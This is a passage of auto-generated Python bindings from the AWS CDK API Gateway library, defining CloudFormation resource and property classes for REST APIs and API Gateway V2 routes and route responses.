props = CfnRestApiProps(api_key_source_type=api_key_source_type, binary_media_types=binary_media_types, body=body, body_s3_location=body_s3_location, clone_from=clone_from, description=description, endpoint_configuration=endpoint_configuration, fail_on_warnings=fail_on_warnings, minimum_compression_size=minimum_compression_size, name=name, parameters=parameters, policy=policy, tags=tags)
jsii.create(CfnRestApi, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="attrRootResourceId")
def attr_root_resource_id(self) -> str:
"""
cloudformationAttribute:
:cloudformationAttribute:: RootResourceId
"""
return jsii.get(self, "attrRootResourceId")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="tags")
def tags(self) -> aws_cdk.core.TagManager:
"""``AWS::ApiGateway::RestApi.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-tags
"""
return jsii.get(self, "tags")
@property
@jsii.member(jsii_name="body")
def body(self) -> typing.Any:
"""``AWS::ApiGateway::RestApi.Body``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-body
"""
return jsii.get(self, "body")
@body.setter
def body(self, value: typing.Any):
return jsii.set(self, "body", value)
@property
@jsii.member(jsii_name="policy")
def policy(self) -> typing.Any:
"""``AWS::ApiGateway::RestApi.Policy``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-policy
"""
return jsii.get(self, "policy")
@policy.setter
def policy(self, value: typing.Any):
return jsii.set(self, "policy", value)
@property
@jsii.member(jsii_name="apiKeySourceType")
def api_key_source_type(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::RestApi.ApiKeySourceType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-apikeysourcetype
"""
return jsii.get(self, "apiKeySourceType")
@api_key_source_type.setter
def api_key_source_type(self, value: typing.Optional[str]):
return jsii.set(self, "apiKeySourceType", value)
@property
@jsii.member(jsii_name="binaryMediaTypes")
def binary_media_types(self) -> typing.Optional[typing.List[str]]:
"""``AWS::ApiGateway::RestApi.BinaryMediaTypes``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-binarymediatypes
"""
return jsii.get(self, "binaryMediaTypes")
@binary_media_types.setter
def binary_media_types(self, value: typing.Optional[typing.List[str]]):
return jsii.set(self, "binaryMediaTypes", value)
@property
@jsii.member(jsii_name="bodyS3Location")
def body_s3_location(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["S3LocationProperty"]]]:
"""``AWS::ApiGateway::RestApi.BodyS3Location``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-bodys3location
"""
return jsii.get(self, "bodyS3Location")
@body_s3_location.setter
def body_s3_location(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["S3LocationProperty"]]]):
return jsii.set(self, "bodyS3Location", value)
@property
@jsii.member(jsii_name="cloneFrom")
def clone_from(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::RestApi.CloneFrom``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-clonefrom
"""
return jsii.get(self, "cloneFrom")
@clone_from.setter
def clone_from(self, value: typing.Optional[str]):
return jsii.set(self, "cloneFrom", value)
@property
@jsii.member(jsii_name="description")
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::RestApi.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-description
"""
return jsii.get(self, "description")
@description.setter
def description(self, value: typing.Optional[str]):
return jsii.set(self, "description", value)
@property
@jsii.member(jsii_name="endpointConfiguration")
def endpoint_configuration(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["EndpointConfigurationProperty"]]]:
"""``AWS::ApiGateway::RestApi.EndpointConfiguration``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-endpointconfiguration
"""
return jsii.get(self, "endpointConfiguration")
@endpoint_configuration.setter
def endpoint_configuration(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["EndpointConfigurationProperty"]]]):
return jsii.set(self, "endpointConfiguration", value)
@property
@jsii.member(jsii_name="failOnWarnings")
def fail_on_warnings(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGateway::RestApi.FailOnWarnings``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-failonwarnings
"""
return jsii.get(self, "failOnWarnings")
@fail_on_warnings.setter
def fail_on_warnings(self, value: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]):
return jsii.set(self, "failOnWarnings", value)
@property
@jsii.member(jsii_name="minimumCompressionSize")
def minimum_compression_size(self) -> typing.Optional[jsii.Number]:
"""``AWS::ApiGateway::RestApi.MinimumCompressionSize``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-minimumcompressionsize
"""
return jsii.get(self, "minimumCompressionSize")
@minimum_compression_size.setter
def minimum_compression_size(self, value: typing.Optional[jsii.Number]):
return jsii.set(self, "minimumCompressionSize", value)
@property
@jsii.member(jsii_name="name")
def name(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::RestApi.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-name
"""
return jsii.get(self, "name")
@name.setter
def name(self, value: typing.Optional[str]):
return jsii.set(self, "name", value)
@property
@jsii.member(jsii_name="parameters")
def parameters(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``AWS::ApiGateway::RestApi.Parameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-parameters
"""
return jsii.get(self, "parameters")
@parameters.setter
def parameters(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]):
return jsii.set(self, "parameters", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnRestApi.EndpointConfigurationProperty", jsii_struct_bases=[], name_mapping={'types': 'types'})
class EndpointConfigurationProperty():
def __init__(self, *, types: typing.Optional[typing.List[str]]=None):
"""
:param types: ``CfnRestApi.EndpointConfigurationProperty.Types``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-restapi-endpointconfiguration.html
"""
self._values = {
}
if types is not None: self._values["types"] = types
@property
def types(self) -> typing.Optional[typing.List[str]]:
"""``CfnRestApi.EndpointConfigurationProperty.Types``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-restapi-endpointconfiguration.html#cfn-apigateway-restapi-endpointconfiguration-types
"""
return self._values.get('types')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'EndpointConfigurationProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnRestApi.S3LocationProperty", jsii_struct_bases=[], name_mapping={'bucket': 'bucket', 'e_tag': 'eTag', 'key': 'key', 'version': 'version'})
class S3LocationProperty():
def __init__(self, *, bucket: typing.Optional[str]=None, e_tag: typing.Optional[str]=None, key: typing.Optional[str]=None, version: typing.Optional[str]=None):
"""
:param bucket: ``CfnRestApi.S3LocationProperty.Bucket``.
:param e_tag: ``CfnRestApi.S3LocationProperty.ETag``.
:param key: ``CfnRestApi.S3LocationProperty.Key``.
:param version: ``CfnRestApi.S3LocationProperty.Version``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-restapi-s3location.html
"""
self._values = {
}
if bucket is not None: self._values["bucket"] = bucket
if e_tag is not None: self._values["e_tag"] = e_tag
if key is not None: self._values["key"] = key
if version is not None: self._values["version"] = version
@property
def bucket(self) -> typing.Optional[str]:
"""``CfnRestApi.S3LocationProperty.Bucket``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-restapi-s3location.html#cfn-apigateway-restapi-s3location-bucket
"""
return self._values.get('bucket')
@property
def e_tag(self) -> typing.Optional[str]:
"""``CfnRestApi.S3LocationProperty.ETag``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-restapi-s3location.html#cfn-apigateway-restapi-s3location-etag
"""
return self._values.get('e_tag')
@property
def key(self) -> typing.Optional[str]:
"""``CfnRestApi.S3LocationProperty.Key``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-restapi-s3location.html#cfn-apigateway-restapi-s3location-key
"""
return self._values.get('key')
@property
def version(self) -> typing.Optional[str]:
"""``CfnRestApi.S3LocationProperty.Version``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-restapi-s3location.html#cfn-apigateway-restapi-s3location-version
"""
return self._values.get('version')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'S3LocationProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnRestApiProps", jsii_struct_bases=[], name_mapping={'api_key_source_type': 'apiKeySourceType', 'binary_media_types': 'binaryMediaTypes', 'body': 'body', 'body_s3_location': 'bodyS3Location', 'clone_from': 'cloneFrom', 'description': 'description', 'endpoint_configuration': 'endpointConfiguration', 'fail_on_warnings': 'failOnWarnings', 'minimum_compression_size': 'minimumCompressionSize', 'name': 'name', 'parameters': 'parameters', 'policy': 'policy', 'tags': 'tags'})
class CfnRestApiProps():
def __init__(self, *, api_key_source_type: typing.Optional[str]=None, binary_media_types: typing.Optional[typing.List[str]]=None, body: typing.Any=None, body_s3_location: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnRestApi.S3LocationProperty"]]]=None, clone_from: typing.Optional[str]=None, description: typing.Optional[str]=None, endpoint_configuration: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnRestApi.EndpointConfigurationProperty"]]]=None, fail_on_warnings: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, minimum_compression_size: typing.Optional[jsii.Number]=None, name: typing.Optional[str]=None, parameters: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None, policy: typing.Any=None, tags: typing.Optional[typing.List[aws_cdk.core.CfnTag]]=None):
"""Properties for defining a ``AWS::ApiGateway::RestApi``.
:param api_key_source_type: ``AWS::ApiGateway::RestApi.ApiKeySourceType``.
:param binary_media_types: ``AWS::ApiGateway::RestApi.BinaryMediaTypes``.
:param body: ``AWS::ApiGateway::RestApi.Body``.
:param body_s3_location: ``AWS::ApiGateway::RestApi.BodyS3Location``.
:param clone_from: ``AWS::ApiGateway::RestApi.CloneFrom``.
:param description: ``AWS::ApiGateway::RestApi.Description``.
:param endpoint_configuration: ``AWS::ApiGateway::RestApi.EndpointConfiguration``.
:param fail_on_warnings: ``AWS::ApiGateway::RestApi.FailOnWarnings``.
:param minimum_compression_size: ``AWS::ApiGateway::RestApi.MinimumCompressionSize``.
:param name: ``AWS::ApiGateway::RestApi.Name``.
:param parameters: ``AWS::ApiGateway::RestApi.Parameters``.
:param policy: ``AWS::ApiGateway::RestApi.Policy``.
:param tags: ``AWS::ApiGateway::RestApi.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html
"""
self._values = {
}
if api_key_source_type is not None: self._values["api_key_source_type"] = api_key_source_type
if binary_media_types is not None: self._values["binary_media_types"] = binary_media_types
if body is not None: self._values["body"] = body
if body_s3_location is not None: self._values["body_s3_location"] = body_s3_location
if clone_from is not None: self._values["clone_from"] = clone_from
if description is not None: self._values["description"] = description
if endpoint_configuration is not None: self._values["endpoint_configuration"] = endpoint_configuration
if fail_on_warnings is not None: self._values["fail_on_warnings"] = fail_on_warnings
if minimum_compression_size is not None: self._values["minimum_compression_size"] = minimum_compression_size
if name is not None: self._values["name"] = name
if parameters is not None: self._values["parameters"] = parameters
if policy is not None: self._values["policy"] = policy
if tags is not None: self._values["tags"] = tags
@property
def api_key_source_type(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::RestApi.ApiKeySourceType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-apikeysourcetype
"""
return self._values.get('api_key_source_type')
@property
def binary_media_types(self) -> typing.Optional[typing.List[str]]:
"""``AWS::ApiGateway::RestApi.BinaryMediaTypes``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-binarymediatypes
"""
return self._values.get('binary_media_types')
@property
def body(self) -> typing.Any:
"""``AWS::ApiGateway::RestApi.Body``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-body
"""
return self._values.get('body')
@property
def body_s3_location(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnRestApi.S3LocationProperty"]]]:
"""``AWS::ApiGateway::RestApi.BodyS3Location``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-bodys3location
"""
return self._values.get('body_s3_location')
@property
def clone_from(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::RestApi.CloneFrom``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-clonefrom
"""
return self._values.get('clone_from')
@property
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::RestApi.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-description
"""
return self._values.get('description')
@property
def endpoint_configuration(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnRestApi.EndpointConfigurationProperty"]]]:
"""``AWS::ApiGateway::RestApi.EndpointConfiguration``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-endpointconfiguration
"""
return self._values.get('endpoint_configuration')
@property
def fail_on_warnings(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGateway::RestApi.FailOnWarnings``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-failonwarnings
"""
return self._values.get('fail_on_warnings')
@property
def minimum_compression_size(self) -> typing.Optional[jsii.Number]:
"""``AWS::ApiGateway::RestApi.MinimumCompressionSize``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-minimumcompressionsize
"""
return self._values.get('minimum_compression_size')
@property
def name(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::RestApi.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-name
"""
return self._values.get('name')
@property
def parameters(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``AWS::ApiGateway::RestApi.Parameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-parameters
"""
return self._values.get('parameters')
@property
def policy(self) -> typing.Any:
"""``AWS::ApiGateway::RestApi.Policy``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-policy
"""
return self._values.get('policy')
@property
def tags(self) -> typing.Optional[typing.List[aws_cdk.core.CfnTag]]:
"""``AWS::ApiGateway::RestApi.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-tags
"""
return self._values.get('tags')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnRestApiProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnRouteResponseV2(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnRouteResponseV2"):
"""A CloudFormation ``AWS::ApiGatewayV2::RouteResponse``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-routeresponse.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGatewayV2::RouteResponse
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, api_id: str, route_id: str, route_response_key: str, model_selection_expression: typing.Optional[str]=None, response_models: typing.Any=None, response_parameters: typing.Any=None) -> None:
"""Create a new ``AWS::ApiGatewayV2::RouteResponse``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param api_id: ``AWS::ApiGatewayV2::RouteResponse.ApiId``.
:param route_id: ``AWS::ApiGatewayV2::RouteResponse.RouteId``.
:param route_response_key: ``AWS::ApiGatewayV2::RouteResponse.RouteResponseKey``.
:param model_selection_expression: ``AWS::ApiGatewayV2::RouteResponse.ModelSelectionExpression``.
:param response_models: ``AWS::ApiGatewayV2::RouteResponse.ResponseModels``.
:param response_parameters: ``AWS::ApiGatewayV2::RouteResponse.ResponseParameters``.
"""
props = CfnRouteResponseV2Props(api_id=api_id, route_id=route_id, route_response_key=route_response_key, model_selection_expression=model_selection_expression, response_models=response_models, response_parameters=response_parameters)
jsii.create(CfnRouteResponseV2, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="apiId")
def api_id(self) -> str:
"""``AWS::ApiGatewayV2::RouteResponse.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-routeresponse.html#cfn-apigatewayv2-routeresponse-apiid
"""
return jsii.get(self, "apiId")
@api_id.setter
def api_id(self, value: str):
return jsii.set(self, "apiId", value)
@property
@jsii.member(jsii_name="responseModels")
def response_models(self) -> typing.Any:
"""``AWS::ApiGatewayV2::RouteResponse.ResponseModels``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-routeresponse.html#cfn-apigatewayv2-routeresponse-responsemodels
"""
return jsii.get(self, "responseModels")
@response_models.setter
def response_models(self, value: typing.Any):
return jsii.set(self, "responseModels", value)
@property
@jsii.member(jsii_name="responseParameters")
def response_parameters(self) -> typing.Any:
"""``AWS::ApiGatewayV2::RouteResponse.ResponseParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-routeresponse.html#cfn-apigatewayv2-routeresponse-responseparameters
"""
return jsii.get(self, "responseParameters")
@response_parameters.setter
def response_parameters(self, value: typing.Any):
return jsii.set(self, "responseParameters", value)
@property
@jsii.member(jsii_name="routeId")
def route_id(self) -> str:
"""``AWS::ApiGatewayV2::RouteResponse.RouteId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-routeresponse.html#cfn-apigatewayv2-routeresponse-routeid
"""
return jsii.get(self, "routeId")
@route_id.setter
def route_id(self, value: str):
return jsii.set(self, "routeId", value)
@property
@jsii.member(jsii_name="routeResponseKey")
def route_response_key(self) -> str:
"""``AWS::ApiGatewayV2::RouteResponse.RouteResponseKey``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-routeresponse.html#cfn-apigatewayv2-routeresponse-routeresponsekey
"""
return jsii.get(self, "routeResponseKey")
@route_response_key.setter
def route_response_key(self, value: str):
return jsii.set(self, "routeResponseKey", value)
@property
@jsii.member(jsii_name="modelSelectionExpression")
def model_selection_expression(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::RouteResponse.ModelSelectionExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-routeresponse.html#cfn-apigatewayv2-routeresponse-modelselectionexpression
"""
return jsii.get(self, "modelSelectionExpression")
@model_selection_expression.setter
def model_selection_expression(self, value: typing.Optional[str]):
return jsii.set(self, "modelSelectionExpression", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnRouteResponseV2.ParameterConstraintsProperty", jsii_struct_bases=[], name_mapping={'required': 'required'})
class ParameterConstraintsProperty():
def __init__(self, *, required: typing.Union[bool, aws_cdk.core.IResolvable]):
"""
:param required: ``CfnRouteResponseV2.ParameterConstraintsProperty.Required``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigatewayv2-routeresponse-parameterconstraints.html
"""
self._values = {
'required': required,
}
@property
def required(self) -> typing.Union[bool, aws_cdk.core.IResolvable]:
"""``CfnRouteResponseV2.ParameterConstraintsProperty.Required``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigatewayv2-routeresponse-parameterconstraints.html#cfn-apigatewayv2-routeresponse-parameterconstraints-required
"""
return self._values.get('required')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'ParameterConstraintsProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnRouteResponseV2Props", jsii_struct_bases=[], name_mapping={'api_id': 'apiId', 'route_id': 'routeId', 'route_response_key': 'routeResponseKey', 'model_selection_expression': 'modelSelectionExpression', 'response_models': 'responseModels', 'response_parameters': 'responseParameters'})
class CfnRouteResponseV2Props():
def __init__(self, *, api_id: str, route_id: str, route_response_key: str, model_selection_expression: typing.Optional[str]=None, response_models: typing.Any=None, response_parameters: typing.Any=None):
"""Properties for defining a ``AWS::ApiGatewayV2::RouteResponse``.
:param api_id: ``AWS::ApiGatewayV2::RouteResponse.ApiId``.
:param route_id: ``AWS::ApiGatewayV2::RouteResponse.RouteId``.
:param route_response_key: ``AWS::ApiGatewayV2::RouteResponse.RouteResponseKey``.
:param model_selection_expression: ``AWS::ApiGatewayV2::RouteResponse.ModelSelectionExpression``.
:param response_models: ``AWS::ApiGatewayV2::RouteResponse.ResponseModels``.
:param response_parameters: ``AWS::ApiGatewayV2::RouteResponse.ResponseParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-routeresponse.html
"""
self._values = {
'api_id': api_id,
'route_id': route_id,
'route_response_key': route_response_key,
}
if model_selection_expression is not None: self._values["model_selection_expression"] = model_selection_expression
if response_models is not None: self._values["response_models"] = response_models
if response_parameters is not None: self._values["response_parameters"] = response_parameters
@property
def api_id(self) -> str:
"""``AWS::ApiGatewayV2::RouteResponse.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-routeresponse.html#cfn-apigatewayv2-routeresponse-apiid
"""
return self._values.get('api_id')
@property
def route_id(self) -> str:
"""``AWS::ApiGatewayV2::RouteResponse.RouteId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-routeresponse.html#cfn-apigatewayv2-routeresponse-routeid
"""
return self._values.get('route_id')
@property
def route_response_key(self) -> str:
"""``AWS::ApiGatewayV2::RouteResponse.RouteResponseKey``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-routeresponse.html#cfn-apigatewayv2-routeresponse-routeresponsekey
"""
return self._values.get('route_response_key')
@property
def model_selection_expression(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::RouteResponse.ModelSelectionExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-routeresponse.html#cfn-apigatewayv2-routeresponse-modelselectionexpression
"""
return self._values.get('model_selection_expression')
@property
def response_models(self) -> typing.Any:
"""``AWS::ApiGatewayV2::RouteResponse.ResponseModels``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-routeresponse.html#cfn-apigatewayv2-routeresponse-responsemodels
"""
return self._values.get('response_models')
@property
def response_parameters(self) -> typing.Any:
"""``AWS::ApiGatewayV2::RouteResponse.ResponseParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-routeresponse.html#cfn-apigatewayv2-routeresponse-responseparameters
"""
return self._values.get('response_parameters')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnRouteResponseV2Props(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnRouteV2(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnRouteV2"):
"""A CloudFormation ``AWS::ApiGatewayV2::Route``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGatewayV2::Route
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, api_id: str, route_key: str, api_key_required: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, authorization_scopes: typing.Optional[typing.List[str]]=None, authorization_type: typing.Optional[str]=None, authorizer_id: typing.Optional[str]=None, model_selection_expression: typing.Optional[str]=None, operation_name: typing.Optional[str]=None, request_models: typing.Any=None, request_parameters: typing.Any=None, route_response_selection_expression: typing.Optional[str]=None, target: typing.Optional[str]=None) -> None:
"""Create a new ``AWS::ApiGatewayV2::Route``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param api_id: ``AWS::ApiGatewayV2::Route.ApiId``.
:param route_key: ``AWS::ApiGatewayV2::Route.RouteKey``.
:param api_key_required: ``AWS::ApiGatewayV2::Route.ApiKeyRequired``.
:param authorization_scopes: ``AWS::ApiGatewayV2::Route.AuthorizationScopes``.
:param authorization_type: ``AWS::ApiGatewayV2::Route.AuthorizationType``.
:param authorizer_id: ``AWS::ApiGatewayV2::Route.AuthorizerId``.
